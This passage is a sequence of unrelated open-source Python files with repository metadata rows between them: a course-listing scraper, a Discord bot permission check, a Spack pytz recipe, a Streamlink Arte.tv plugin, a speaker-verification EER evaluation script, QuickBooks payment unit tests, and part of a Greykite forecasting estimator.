def Crawl(self, obj = False):
bs = self.FixToBS()
# 找寻其所有页数
final_tr = bs.find_all('tr')[-1]
pattern = RE.compile(r'第 ([0-9]+) \/ ([0-9]+) 頁')
match = pattern.match(final_tr.get_text())
self.Pages = int(match[2])
# 开始把找到的列物件化
result = []
for tr in bs.find_all('tr')[3:-2]: # 去头去尾
tmp = []
idx = 0
for td in tr.find_all('td'):
# 学校代码问题,会超出 25
if idx < 25:
tmp_text = td.get_text().strip().replace(' ', '-')
if idx == 7:
# 课名只取中文
name = td.find('a').get_text().strip()
tmp.append(name)
tmp.append(CC.T2S(name)) # 简体字课名
tmp.append(td.find('a')['href']) # 课纲网址
elif idx == 3 or idx == 15:
# 简体字系所、老师
tmp.append(tmp_text)
tmp.append(CC.T2S(tmp_text))
else:
tmp.append(tmp_text)
else:
break
idx += 1
if obj:
result.append(ClassDetail(tmp))
else:
result.append(tmp)
return result
# 其他设定
def SetConfig(self, key, value):
self.Config[key] = value
# 清除并重置设定
def Reset(self):
self.Config = {
'a': 1, #
'HIS': 1, #
'IDNO': '', #
'ITEM': '', #
'D0': Req.Year, # 課程學年期 1071
'DEG_COD': '*', # 查詢依開課系所 * A B M N P
'D1': '', # 查詢依開課系所
'D2': '', # 年級
'CLASS_COD': '', # 班级
'SECT_COD': '', # 组别
'TYP': 1, # 查詢項目 1(课程时间) 2(修课人数)
'teacher': '', # 授课教师
'crsname': '', # 课程名称
'T3': '', # 课别代号
'WKDAY': '', # 星期 1 2 3 4 5 6 7
'SECT': '', # 节次 A 1 2 3 4 B 5 6 7 8 9 C D E F
'page': 1, # 页数
'bottom_per_page': 10, # 没屁用
'data_per_page': 20 # 没屁用
}
| 27.495652 | 74 | 0.424415 |
759220bd982a405d443c509296e9167c676bede4 | 3,364 | py | Python | monty/exts/backend/global_checks.py | onerandomusername/monty-python | fcd8b2827eb9bbb2a05d28f80ac9e215589f03f7 | [
"MIT"
] | 20 | 2021-12-31T10:17:20.000Z | 2022-03-31T04:16:17.000Z | monty/exts/backend/global_checks.py | onerandomusername/monty-bot | b1c769e44b56bc45f37fc809064571d59c80db27 | [
"MIT"
] | 1 | 2022-03-13T22:34:33.000Z | 2022-03-13T22:34:52.000Z | monty/exts/backend/global_checks.py | onerandomusername/monty-bot | b1c769e44b56bc45f37fc809064571d59c80db27 | [
"MIT"
] | 3 | 2022-01-02T15:21:46.000Z | 2022-03-05T09:37:54.000Z | import disnake
from disnake.ext import commands
from monty.bot import Monty
from monty.errors import BotAccountRequired
from monty.log import get_logger
logger = get_logger(__name__)
class GlobalCheck(commands.Cog, slash_command_attrs={"dm_permission": False}):
"""Global checks for monty."""
def __init__(self, bot: Monty):
self.bot = bot
self._bot_invite_link: str = ""
self._checks = {attr: getattr(self, attr) for attr in dir(self) if attr.startswith("global_check_")}
self.add_checks()
@commands.Cog.listener("on_ready")
async def set_invite_link(self) -> None:
"""Set the invite link when the bot is ready."""
if self._bot_invite_link:
return
class FakeGuild:
id = "{guild_id}"
guild = FakeGuild
self._bot_invite_link = disnake.utils.oauth_url(
self.bot.user.id,
disable_guild_select=True,
guild=guild,
scopes={"applications.commands", "bot"},
permissions=self.bot.invite_permissions,
)
def add_checks(self) -> None:
"""Adds all checks to the bot."""
for name, check in self._checks.items():
if name.startswith("global_check_app_cmd"):
self.bot.add_app_command_check(
check, call_once=True, slash_commands=True, user_commands=True, message_commands=True
)
elif name.startswith("global_check_prefix_cmd"):
self.bot.add_check(check, call_once=True)
else:
logger.warn(f"Invalid named check in {type(self).__name__} cog")
def remove_checks(self) -> None:
"""Removes all cog checks from the bot."""
for name, check in self._checks.items():
if name.startswith("global_check_app_cmd"):
self.bot.remove_app_command_check(
check, call_once=True, slash_commands=True, user_commands=True, message_commands=True
)
elif name.startswith("global_check_prefix_cmd"):
self.bot.remove_check(check, call_once=True)
else:
# no warning here as it was warned for during load
pass
def global_check_app_cmd(self, inter: disnake.CommandInteraction) -> bool:
"""Require all commands be in a guild and have the bot scope."""
if inter.guild or not inter.guild_id:
return True
invite = self._bot_invite_link.format(guild_id=inter.guild_id)
if inter.permissions.manage_guild:
msg = (
f"The bot scope is required to perform any actions. "
f"You can invite the full bot by [clicking here](<{invite}>)."
)
else:
msg = (
f"The bot scope is required to perform any actions. "
f"Please ask a server manager to [invite the full bot](<{invite}>)."
)
raise BotAccountRequired(msg)
def global_check_prefix_cmd(self, ctx: commands.Context) -> bool:
"""Require all commands be in guild."""
if ctx.guild:
return True
raise commands.NoPrivateMessage()
cog_unload = remove_checks
def setup(bot: Monty) -> None:
"""Add the global checks to the bot."""
bot.add_cog(GlobalCheck(bot))
| 35.410526 | 108 | 0.606124 |
7e42f9af9f63e394e19613df939fd6aa25a87b6b | 1,299 | py | Python | var/spack/repos/builtin/packages/py-pytz/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2020-10-15T01:08:42.000Z | 2021-10-18T01:28:18.000Z | var/spack/repos/builtin/packages/py-pytz/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2019-07-30T10:12:28.000Z | 2019-12-17T09:02:27.000Z | var/spack/repos/builtin/packages/py-pytz/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2019-07-30T09:42:14.000Z | 2021-01-25T05:39:20.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPytz(PythonPackage):
"""World timezone definitions, modern and historical."""
homepage = "http://pythonhosted.org/pytz"
url = "https://pypi.io/packages/source/p/pytz/pytz-2019.3.tar.gz"
import_modules = ['pytz']
version('2019.3', sha256='b02c06db6cf09c12dd25137e563b31700d3b80fcc4ad23abb7a315f2789819be')
version('2018.4', sha256='c06425302f2cf668f1bba7a0a03f3c1d34d4ebeef2c72003da308b3947c7f749')
version('2016.10', sha256='9a43e20aa537cfad8fe7a1715165c91cb4a6935d40947f2d070e4c80f2dcd22b')
version('2016.6.1', sha256='6f57732f0f8849817e9853eb9d50d85d1ebb1404f702dbc44ee627c642a486ca')
version('2014.10', sha256='a94138b638907491f473c875e8c95203a6a02efef52b6562be302e435016f4f3')
version('2014.9', sha256='c5bcbd11cf9847096ae1eb4e83dde75d10ac62efe6e73c4600f3f980968cdbd2')
version('2015.4', sha256='c4ee70cb407f9284517ac368f121cf0796a7134b961e53d9daf1aaae8f44fb90')
version('2016.3', sha256='3449da19051655d4c0bb5c37191331748bcad15804d81676a88451ef299370a8')
depends_on('py-setuptools', type='build')
| 48.111111 | 98 | 0.786759 |
822cff52e3046b33fa723bd02cebf6aaf7058dbe | 3,541 | py | Python | src/streamlink/plugins/artetv.py | nxkbd/streamlink | 0ba7767c024a6d6086d570e342680dc40c05a57b | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/artetv.py | nxkbd/streamlink | 0ba7767c024a6d6086d570e342680dc40c05a57b | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/artetv.py | nxkbd/streamlink | 0ba7767c024a6d6086d570e342680dc40c05a57b | [
"BSD-2-Clause"
] | null | null | null | """Plugin for Arte.tv, bi-lingual art and culture channel."""
import re
from itertools import chain
from streamlink.compat import urlparse
from streamlink.plugin import Plugin
from streamlink.plugin.api import http, validate
from streamlink.stream import HDSStream, HLSStream, HTTPStream, RTMPStream
SWF_URL = "http://www.arte.tv/player/v2/jwplayer6/mediaplayer.6.6.swf"
JSON_VOD_URL = "https://api.arte.tv/api/player/v1/config/{}/{}"
JSON_LIVE_URL = "https://api.arte.tv/api/player/v1/livestream/{}"
_url_re = re.compile(r"""
https?://(?:\w+\.)?arte.tv/guide/
(?P<language>[a-z]{2})/
(?:
(?P<video_id>.+?)/.+ | # VOD
(?:direct|live) # Live TV
)
""", re.VERBOSE)
_video_schema = validate.Schema({
"videoJsonPlayer": {
"VSR": validate.any(
[],
{
validate.text: {
"height": int,
"mediaType": validate.text,
"url": validate.text,
validate.optional("streamer"): validate.text
},
},
),
"VTY": validate.text
}
})
class ArteTV(Plugin):
@classmethod
def can_handle_url(self, url):
return _url_re.match(url)
def _create_stream(self, stream, is_live):
stream_name = "{0}p".format(stream["height"])
stream_type = stream["mediaType"]
stream_url = stream["url"]
if stream_type in ("hls", "mp4"):
if urlparse(stream_url).path.endswith("m3u8"):
try:
streams = HLSStream.parse_variant_playlist(self.session, stream_url)
# TODO: Replace with "yield from" when dropping Python 2.
for stream in streams.items():
yield stream
except IOError as err:
self.logger.error("Failed to extract HLS streams: {0}", err)
else:
yield stream_name, HTTPStream(self.session, stream_url)
elif stream_type == "f4m":
try:
streams = HDSStream.parse_manifest(self.session, stream_url)
for stream in streams.items():
yield stream
except IOError as err:
self.logger.error("Failed to extract HDS streams: {0}", err)
elif stream_type == "rtmp":
params = {
"rtmp": stream["streamer"],
"playpath": stream["url"],
"swfVfy": SWF_URL,
"pageUrl": self.url,
}
if is_live:
params["live"] = True
else:
params["playpath"] = "mp4:{0}".format(params["playpath"])
stream = RTMPStream(self.session, params)
yield stream_name, stream
def _get_streams(self):
match = _url_re.match(self.url)
language = match.group('language')
video_id = match.group('video_id')
if video_id is None:
json_url = JSON_LIVE_URL.format(language)
else:
json_url = JSON_VOD_URL.format(language, video_id)
res = http.get(json_url)
video = http.json(res, schema=_video_schema)
if not video["videoJsonPlayer"]["VSR"]:
return
is_live = video["videoJsonPlayer"]["VTY"] == "LIVE"
vsr = video["videoJsonPlayer"]["VSR"].values()
streams = (self._create_stream(stream, is_live) for stream in vsr)
return chain.from_iterable(streams)
__plugin__ = ArteTV
| 31.336283 | 88 | 0.550409 |
c24295eb14ef47ae8937923ca9059186dfdebbc0 | 1,907 | py | Python | eval.py | sunshines14/ASV-baseline | c2b957189c33eba14003b8bfa88e3c459fb93697 | [
"MIT"
] | 1 | 2021-05-12T08:52:57.000Z | 2021-05-12T08:52:57.000Z | eval.py | sunshines14/ASV-baseline | c2b957189c33eba14003b8bfa88e3c459fb93697 | [
"MIT"
] | null | null | null | eval.py | sunshines14/ASV-baseline | c2b957189c33eba14003b8bfa88e3c459fb93697 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#-*- coding: utf-8 -*-
# Copyright 2020 Sogang University Auditory Intelligence Laboratory (Author: Soonshin Seo)
#
# MIT License
import os
import numpy
import argparse
import pdb
import numpy as np
from scipy.optimize import brentq
from sklearn.metrics import roc_curve
from scipy.interpolate import interp1d
parser = argparse.ArgumentParser(description = "eval");
parser.add_argument('--ground_truth', type=str, default=None);
parser.add_argument('--prediction', type=str, default=None);
parser.add_argument('--positive', type=int, default=1, help='1 if higher is positive; 0 is lower is positive');
opt = parser.parse_args();
def read_score(filename):
with open(filename) as f:
scores = f.readlines()
scores = [float(x.split()[0]) for x in scores]
return scores
def calculate_metrics(y, y_score, pos):
# y: groundtruth scores,
# y_score: prediction scores.
# confusion matrix
#
# in/out true false
# true true-positive false-positive
# false false-negative true-negative
# compute equal error rate (EER)
fpr, tpr, thresholds = roc_curve(y, y_score, pos_label=pos)
eer = brentq(lambda x : 1. - x - interp1d(fpr, tpr)(x), 0., 1.)
thresh = interp1d(fpr, thresholds)(eer)
# compute normalized minimum detection cost function (minDCF)
c_miss = 10
fnr = 1 - tpr
p_target=0.01
c_fa=1
dcf = c_miss * fnr * p_target + c_fa * fpr * (1 - p_target)
c_det = np.min(dcf)
c_def = min(c_miss * p_target, c_fa * (1 - p_target))
m_dcf = c_det/c_def
return eer, thresh, m_dcf
if __name__ == '__main__':
y = read_score(opt.ground_truth)
y_score = read_score(opt.prediction)
eer, thresh, m_dcf = calculate_metrics(y,y_score,opt.positive)
print('EER : %.4f%%'%(eer*100))
print('thresh : %.4f'%(thresh))
print('minDCF : %.4f'%(m_dcf)) | 31.262295 | 111 | 0.665443 |
4691d5f205b68fa319b783f97d704d43d5876dfa | 1,183 | py | Python | tests/unit/objects/test_creditcardpayment.py | bayusantoso/python-intuitquickbooks | a501fd86b6ba59f5a614f36951fa08bde0d2d24a | [
"MIT"
] | null | null | null | tests/unit/objects/test_creditcardpayment.py | bayusantoso/python-intuitquickbooks | a501fd86b6ba59f5a614f36951fa08bde0d2d24a | [
"MIT"
] | null | null | null | tests/unit/objects/test_creditcardpayment.py | bayusantoso/python-intuitquickbooks | a501fd86b6ba59f5a614f36951fa08bde0d2d24a | [
"MIT"
] | 1 | 2020-12-07T22:21:35.000Z | 2020-12-07T22:21:35.000Z | import unittest
from intuitquickbooks.objects.creditcardpayment import CreditCardPayment, CreditChargeResponse, CreditChargeInfo
class CreditCardPaymentTests(unittest.TestCase):
def test_init(self):
payment = CreditCardPayment()
self.assertEquals(payment.CreditChargeInfo, None)
self.assertEquals(payment.CreditChargeResponse, None)
class CreditChargeResponseTests(unittest.TestCase):
def test_init(self):
response = CreditChargeResponse()
self.assertEquals(response.CCTransId, "")
self.assertEquals(response.AuthCode, "")
self.assertEquals(response.TxnAuthorizationTime, "")
self.assertEquals(response.Status, "")
class CreditChargeInfoTests(unittest.TestCase):
def test_init(self):
info = CreditChargeInfo()
self.assertEquals(info.Type, "")
self.assertEquals(info.NameOnAcct, "")
self.assertEquals(info.CcExpiryMonth, 0)
self.assertEquals(info.CcExpiryYear, 0)
self.assertEquals(info.BillAddrStreet, "")
self.assertEquals(info.PostalCode, "")
self.assertEquals(info.Amount, 0)
self.assertEquals(info.ProcessPayment, False)
| 32.861111 | 112 | 0.716822 |
ec8915631d3f3d0aa061daeaf6b2a7750c7998f2 | 23,016 | py | Python | greykite/sklearn/estimator/base_silverkite_estimator.py | briancpark/greykite | 2f484978a7ed206ebd9356e02fc1fb881cd25205 | [
"BSD-2-Clause"
] | null | null | null | greykite/sklearn/estimator/base_silverkite_estimator.py | briancpark/greykite | 2f484978a7ed206ebd9356e02fc1fb881cd25205 | [
"BSD-2-Clause"
] | null | null | null | greykite/sklearn/estimator/base_silverkite_estimator.py | briancpark/greykite | 2f484978a7ed206ebd9356e02fc1fb881cd25205 | [
"BSD-2-Clause"
] | null | null | null | # BSD 2-CLAUSE LICENSE
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# #ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# original author: Albert Chen, Reza Hosseini, Sayan Patra
"""sklearn estimator with common functionality between
SilverkiteEstimator and SimpleSilverkiteEstimator.
"""
from typing import Dict
from typing import Optional
import modin.pandas as pd
from sklearn.exceptions import NotFittedError
from sklearn.metrics import mean_squared_error
from greykite.algo.common.col_name_utils import create_pred_category
from greykite.algo.forecast.silverkite.forecast_silverkite import SilverkiteForecast
from greykite.algo.forecast.silverkite.forecast_silverkite_helper import get_silverkite_uncertainty_dict
from greykite.algo.forecast.silverkite.silverkite_diagnostics import SilverkiteDiagnostics
from greykite.common import constants as cst
from greykite.common.time_properties import min_gap_in_seconds
from greykite.common.time_properties_forecast import get_simple_time_frequency_from_period
from greykite.sklearn.estimator.base_forecast_estimator import BaseForecastEstimator
class BaseSilverkiteEstimator(BaseForecastEstimator):
"""A base class for forecast estimators that fit using
`~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.
Notes
-----
Allows estimators that fit using
`~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`
to share the same functions for input data validation,
fit postprocessing, predict, summary, plot_components, etc.
Subclasses should:
- Implement their own ``__init__`` that uses a superset of the parameters here.
- Implement their own ``fit``, with this sequence of steps:
- calls ``super().fit``
- calls ``SilverkiteForecast.forecast`` or ``SimpleSilverkiteForecast.forecast_simple`` and stores the result in ``self.model_dict``
- calls ``super().finish_fit``
Uses ``coverage`` to set prediction band width. Even though
coverage is not needed by ``forecast_silverkite``, it is included
in every ``BaseForecastEstimator`` to be used universally for
forecast evaluation.
Therefore, ``uncertainty_dict`` must be consistent with ``coverage``
if provided as a dictionary. If ``uncertainty_dict`` is None or
"auto", an appropriate default value is set, according to ``coverage``.
Parameters
----------
score_func : callable, optional, default mean_squared_error
See `~greykite.sklearn.estimator.base_forecast_estimator.BaseForecastEstimator`.
coverage : `float` between [0.0, 1.0] or None, optional
See `~greykite.sklearn.estimator.base_forecast_estimator.BaseForecastEstimator`.
null_model_params : `dict`, optional
Dictionary with arguments to define DummyRegressor null model, default is `None`.
See `~greykite.sklearn.estimator.base_forecast_estimator.BaseForecastEstimator`.
uncertainty_dict : `dict` or `str` or None, optional
How to fit the uncertainty model.
See `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.
Note that this is allowed to be "auto". If None or "auto", will be set to
a default value by ``coverage`` before calling ``forecast_silverkite``.
Attributes
----------
silverkite : Class or a derived class of `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast`
The silverkite algorithm instance used for forecasting
silverkite_diagnostics : Class or a derived class of `~greykite.algo.forecast.silverkite.silverkite_diagnostics.SilverkiteDiagnostics`
The silverkite class used for plotting and generating model summary.
model_dict : `dict` or None
A dict with fitted model and its attributes.
The output of `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.
pred_cols : `list` [`str`] or None
Names of the features used in the model.
feature_cols : `list` [`str`] or None
Column names of the patsy design matrix built by
`~greykite.algo.common.ml_models.design_mat_from_formula`.
df : `pandas.DataFrame` or None
The training data used to fit the model.
coef_ : `pandas.DataFrame` or None
Estimated coefficient matrix for the model.
Not available for ``random forest`` and ``gradient boosting`` methods and
set to the default value `None`.
_pred_category : `dict` or None
A dictionary with keys being the predictor category and
values being the predictors belonging to the category.
For details, see
`~greykite.sklearn.estimator.base_silverkite_estimator.BaseSilverkiteEstimator.pred_category`.
extra_pred_cols : `list` or None
User provided extra predictor names, for details, see
`~greykite.sklearn.estimator.simple_silverkite_estimator.SimpleSilverkiteEstimator`
or
`~greykite.sklearn.estimator.silverkite_estimator.SilverkiteEstimator`.
forecast : `pandas.DataFrame` or None
Output of ``predict_silverkite``, set by ``self.predict``.
model_summary : `class` or `None`
The `~greykite.algo.common.model_summary.ModelSummary` class.
See Also
--------
`~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`
Function performing the fit and predict.
Notes
-----
The subclasses will pass ``fs_components_df`` to ``forecast_silverkite``. The model terms
it creates internally are used to generate the component plots.
- `~greykite.common.features.timeseries_features.fourier_series_multi_fcn` uses
``fs_components_df["names"]`` (e.g. ``tod``, ``tow``) to build the fourier series
and to create column names.
- ``fs_components_df["seas_names"]`` (e.g. ``daily``, ``weekly``) is appended
to the column names, if provided.
`~greykite.algo.forecast.silverkite.silverkite_diagnostics.SilverkiteDiagnostics.plot_silverkite_components` groups
based on ``fs_components_df["seas_names"]`` passed to ``forecast_silverkite`` during fit.
E.g. any column containing ``daily`` is added to daily seasonality effect. The reason
is as follows:
1. User can provide ``tow`` and ``str_dow`` for weekly seasonality.
These should be aggregated, and we can do that only based on "seas_names".
2. yearly and quarterly seasonality both use ``ct1`` as "names" column.
Only way to distinguish those effects is via "seas_names".
3. ``ct1`` is also used for growth. If it is interacted with seasonality, the columns become
indistinguishable without "seas_names".
Additionally, the function sets yaxis labels based on ``seas_names``:
``daily`` as ylabel is much more informative than ``tod`` as ylabel in component plots.
"""
def __init__(
self,
silverkite: SilverkiteForecast = SilverkiteForecast(),
silverkite_diagnostics: SilverkiteDiagnostics = SilverkiteDiagnostics(),
score_func: callable = mean_squared_error,
coverage: float = None,
null_model_params: Optional[Dict] = None,
uncertainty_dict: Optional[Dict] = None):
# initializes null model
super().__init__(
score_func=score_func,
coverage=coverage,
null_model_params=null_model_params)
# required in subclasses __init__
self.uncertainty_dict = uncertainty_dict
# set by `fit`
# fitted model in dictionary format returned from
# the `forecast_silverkite` function
self.silverkite: SilverkiteForecast = silverkite
self.silverkite_diagnostics: SilverkiteDiagnostics = silverkite_diagnostics
self.model_dict = None
self.pred_cols = None
self.feature_cols = None
self.df = None
self.coef_ = None
# Predictor category, lazy initialization as None.
# Will be updated in property function pred_category when needed.
self._pred_category = None
self.extra_pred_cols = None # all silverkite estimators should support this.
# set by the predict method
self.forecast = None
# set by the summary method
self.model_summary = None
def __set_uncertainty_dict(self, X, time_col, value_col):
"""Checks if ``coverage`` is consistent with the ``uncertainty_dict``
used to train the ``forecast_silverkite`` model. Sets ``uncertainty_dict``
to a default value if ``coverage`` is provided, and vice versa.
Parameters
----------
X: `pandas.DataFrame`
Input timeseries, with timestamp column,
value column, and any additional regressors.
The value column is the response, included in
``X`` to allow transformation by `sklearn.pipeline.Pipeline`.
time_col: `str`
Time column name in ``X``.
value_col: `str`
Value column name in ``X``.
Notes
-----
Intended to be called by `fit`.
``X`` is necessary to define default parameters for
``uncertainty_dict`` if ``coverage`` is provided but ``uncertainty_dict is None``
or ``uncertainty_dict=="auto"``.
(NB: ``X`` would not be necessary and this function could called from __init__
if ``forecast_silverkite`` provides a default value for ``uncertainty_dict``
given the target coverage).
"""
period = min_gap_in_seconds(df=X, time_col=time_col)
simple_freq = get_simple_time_frequency_from_period(period).name
# Updates `uncertainty_dict` if None or "auto" or missing quantiles,
# to match ``coverage``.
# Raises an exception if both are provided and they don't match.
self.uncertainty_dict = get_silverkite_uncertainty_dict(
uncertainty=self.uncertainty_dict,
simple_freq=simple_freq,
coverage=self.coverage)
# Updates coverage if None, to match the widest interval of
# ``uncertainty_dict``. If coverage is not None, they are
# already consistent, but we set it anyway.
if self.uncertainty_dict is not None:
quantiles = self.uncertainty_dict["params"]["quantiles"]
self.coverage = quantiles[-1] - quantiles[0]
def fit(
self,
X,
y=None,
time_col=cst.TIME_COL,
value_col=cst.VALUE_COL,
**fit_params):
"""Pre-processing before fitting ``Silverkite`` forecast model.
Parameters
----------
X: `pandas.DataFrame`
Input timeseries, with timestamp column,
value column, and any additional regressors.
The value column is the response, included in
``X`` to allow transformation by `sklearn.pipeline`.
y: ignored
The original timeseries values, ignored.
(The ``y`` for fitting is included in ``X``).
time_col: `str`
Time column name in ``X``.
value_col: `str`
Value column name in ``X``.
fit_params: `dict`
additional parameters for null model.
Notes
-----
Subclasses are expected to call this at the beginning of their ``fit`` method,
before calling `~greykite.algo.forecast.silverkite.forecast_silverkite.SilverkiteForecast.forecast`.
"""
# NB: calls `__set_uncertainty_dict` before `super().fit` to ensure
# coverage is correct before fitting the null model.
# (null model does not currently use `coverage`, but may in the future.)
self.__set_uncertainty_dict(
X=X,
time_col=time_col,
value_col=value_col)
self.df = X
super().fit(
X=X,
y=y,
time_col=time_col,
value_col=value_col,
**fit_params)
def finish_fit(self):
"""Makes important values of ``self.model_dict`` conveniently accessible.
To be called by subclasses at the end of their ``fit`` method. Sets
{``pred_cols``, ``feature_cols``, and ``coef_``}.
"""
if self.model_dict is None:
raise ValueError("Must set `self.model_dict` before calling this function.")
self.pred_cols = self.model_dict["pred_cols"]
self.feature_cols = self.model_dict["x_mat"].columns
# model coefficients
if hasattr(self.model_dict["ml_model"], "coef_"):
self.coef_ = pd.DataFrame(
self.model_dict["ml_model"].coef_,
index=self.feature_cols)
self._set_silverkite_diagnostics_params()
return self
def _set_silverkite_diagnostics_params(self):
if self.silverkite_diagnostics is None:
self.silverkite_diagnostics = SilverkiteDiagnostics()
self.silverkite_diagnostics.set_params(self.pred_category, self.time_col_, self.value_col_)
def predict(self, X, y=None):
"""Creates forecast for the dates specified in ``X``.
Parameters
----------
X: `pandas.DataFrame`
Input timeseries with timestamp column and any additional regressors.
Timestamps are the dates for prediction.
Value column, if provided in ``X``, is ignored.
y: ignored.
Returns
-------
predictions: `pandas.DataFrame`
Forecasted values for the dates in ``X``. Columns:
- ``TIME_COL``: dates
- ``PREDICTED_COL``: predictions
- ``PREDICTED_LOWER_COL``: lower bound of predictions, optional
- ``PREDICTED_UPPER_COL``: upper bound of predictions, optional
- [other columns], optional
``PREDICTED_LOWER_COL`` and ``PREDICTED_UPPER_COL`` are present
if ``self.coverage`` is not None.
"""
# Returns the cached result if applicable
cached_predictions = super().predict(X=X)
if cached_predictions is not None:
return cached_predictions
if self.model_dict is None:
raise NotFittedError("Call `fit` before calling `predict`.")
if self.pred_cols is None:
raise NotFittedError("Subclass must call `finish_fit` inside the `fit` method.")
pred_df = self.silverkite.predict(
fut_df=X,
trained_model=self.model_dict,
past_df=None,
new_external_regressor_df=None)["fut_df"] # regressors are included in X
self.forecast = pred_df
# renames columns to standardized schema
output_columns = {
self.time_col_: cst.TIME_COL,
cst.VALUE_COL: cst.PREDICTED_COL}
# Checks if uncertainty is also returned.
# If so, extract the upper and lower limits of the tuples in
# ``uncertainty_col`` to be lower and upper limits of the prediction interval.
# Note that the tuple might have more than two elements if more than two
# ``quantiles`` are passed in ``uncertainty_dict``.
uncertainty_col = f"{cst.VALUE_COL}_quantile_summary"
if uncertainty_col in list(pred_df.columns):
pred_df[cst.PREDICTED_LOWER_COL] = pred_df[uncertainty_col].apply(
lambda x: x[0])
pred_df[cst.PREDICTED_UPPER_COL] = pred_df[uncertainty_col].apply(
lambda x: x[-1])
output_columns.update({
cst.PREDICTED_LOWER_COL: cst.PREDICTED_LOWER_COL,
cst.PREDICTED_UPPER_COL: cst.PREDICTED_UPPER_COL,
uncertainty_col: uncertainty_col})
if cst.ERR_STD_COL in pred_df.columns:
output_columns.update({cst.ERR_STD_COL: cst.ERR_STD_COL})
predictions = (pred_df[output_columns.keys()]
.rename(output_columns, axis=1))
# Caches the predictions
self.cached_predictions_ = predictions
return predictions
@property
def pred_category(self):
"""A dictionary that stores the predictor names in each category.
This property is not initialized until used. This speeds up the
fitting process. The categories includes
- "intercept" : the intercept.
- "time_features" : the predictors that include
`~greykite.common.constants.TIME_FEATURES`
but not
`~greykite.common.constants.SEASONALITY_REGEX`.
- "event_features" : the predictors that include
`~greykite.common.constants.EVENT_PREFIX`.
- "trend_features" : the predictors that include
`~greykite.common.constants.TREND_REGEX`
but not
`~greykite.common.constants.SEASONALITY_REGEX`.
- "seasonality_features" : the predictors that include
`~greykite.common.constants.SEASONALITY_REGEX`.
- "lag_features" : the predictors that include
`~greykite.common.constants.LAG_REGEX`.
- "regressor_features" : external regressors and other predictors
manually passed to ``extra_pred_cols``, but not in the categories above.
- "interaction_features" : the predictors that include
interaction terms, i.e., including a colon.
Note that each predictor falls into at least one category.
Some "time_features" may also be "trend_features".
Predictors with an interaction are classified into all categories matched by
the interaction components. Thus, "interaction_features" are already included
in the other categories.
"""
if self.model_dict is None:
raise NotFittedError("Must fit before getting predictor category.")
if self._pred_category is None:
# extra_pred_cols could be None/list
extra_pred_cols = [] if self.extra_pred_cols is None else self.extra_pred_cols
# regressor_cols could be non-exist/None/list
# the if catches non-exist and None
regressor_cols = [] if getattr(self, "regressor_cols", None) is None else getattr(self, "regressor_cols")
self._pred_category = create_pred_category(
pred_cols=self.model_dict["x_mat"].columns,
# extra regressors are specified via "regressor_cols" in simple_silverkite_estimator
extra_pred_cols=extra_pred_cols + regressor_cols)
return self._pred_category
def summary(self, max_colwidth=20):
if self.silverkite_diagnostics is None:
self._set_silverkite_diagnostics_params()
return self.silverkite_diagnostics.summary(self.model_dict, max_colwidth)
def plot_components(self, names=None, title=None):
if self.model_dict is None:
raise NotFittedError("Call `fit` before calling `plot_components`.")
if self.silverkite_diagnostics is None:
self._set_silverkite_diagnostics_params()
return self.silverkite_diagnostics.plot_components(self.model_dict, names, title)
def plot_trend(self, title=None):
"""Convenience function to plot the data and the trend component.
Parameters
----------
title: `str`, optional, default `None`
Plot title.
Returns
-------
fig: `plotly.graph_objs.Figure`
Figure.
"""
if title is None:
title = "Trend plot"
return self.plot_components(names=["trend"], title=title)
def plot_seasonalities(self, title=None):
"""Convenience function to plot the data and the seasonality components.
Parameters
----------
title: `str`, optional, default `None`
Plot title.
Returns
-------
fig: `plotly.graph_objs.Figure`
Figure.
"""
if title is None:
title = "Seasonality plot"
seas_names = [
"DAILY_SEASONALITY",
"WEEKLY_SEASONALITY",
"MONTHLY_SEASONALITY",
"QUARTERLY_SEASONALITY",
"YEARLY_SEASONALITY"]
return self.plot_components(names=seas_names, title=title)
def plot_trend_changepoint_detection(self, params=None):
"""Convenience function to plot the original trend changepoint detection results.
Parameters
----------
params : `dict` or `None`, default `None`
The parameters in `~greykite.algo.changepoint.adalasso.changepoint_detector.ChangepointDetector.plot`.
